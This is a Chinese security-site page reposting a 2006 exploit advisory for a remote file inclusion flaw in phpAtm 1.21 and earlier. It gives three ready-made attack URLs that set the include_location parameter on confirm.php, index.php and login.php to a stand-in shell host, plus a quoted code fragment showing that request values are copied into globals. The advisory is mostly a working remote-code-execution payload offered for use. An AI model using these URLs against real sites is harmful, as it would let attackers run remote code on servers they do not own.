首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities
来源:MHG Security Team 作者:KinSize 发布时间:2006-08-31  

########################################################################
# phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit
#
# Level : Dangerous
# Download : http://phpatm.free.fr/
# Version : v1.21
#
# Found By: KinSize [MHG Security Team]
#
########################################################################
# Code : include($include_location.'include/conf.php');
#
# exploit:
# http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/index.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/login.php?include_location=http://shellurl.com ?
########################################################################
#
#Conatact : nefretaskimdir[at]gmail.com
#
# GreetZ : Damage-N | by_emr3 | by_OkSit | ESKOBAR | Ye.iL | PowerCobra | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim
########################################################################

Added information:

At first glance this doesn't look vulnerable but then again:

line 85-94 of common.php
while (list(, $arr) = each($sysarr))
{
if (is_array($arr))
{
while (list($key, $value) = each($arr))
{
$GLOBALS[$key] = $value;
}
}
}

/str0ke



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZipCentral 4.01 ZIP File Handl
·Lanifex DMO <= 2.3b (_incMg
·Streamripper <= 1.61.25 HTT
·0verkill 0.16 (ASCII-ART Game)
·IBM eGatherer <= 3.20.0284.
·RCblog <= 1.03 (post) Remot
·Streamripper <= 1.61.25 HTT
·blur6ex <= 0.3.462 (ID) Adm
·phpGroupWare <= 0.9.16.010
·CesarFTP 0.99g (MKD) Remote Bu
·e107 <= 0.75 (GLOBALS Overw
·MyBulletinBoard (MyBB) < 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved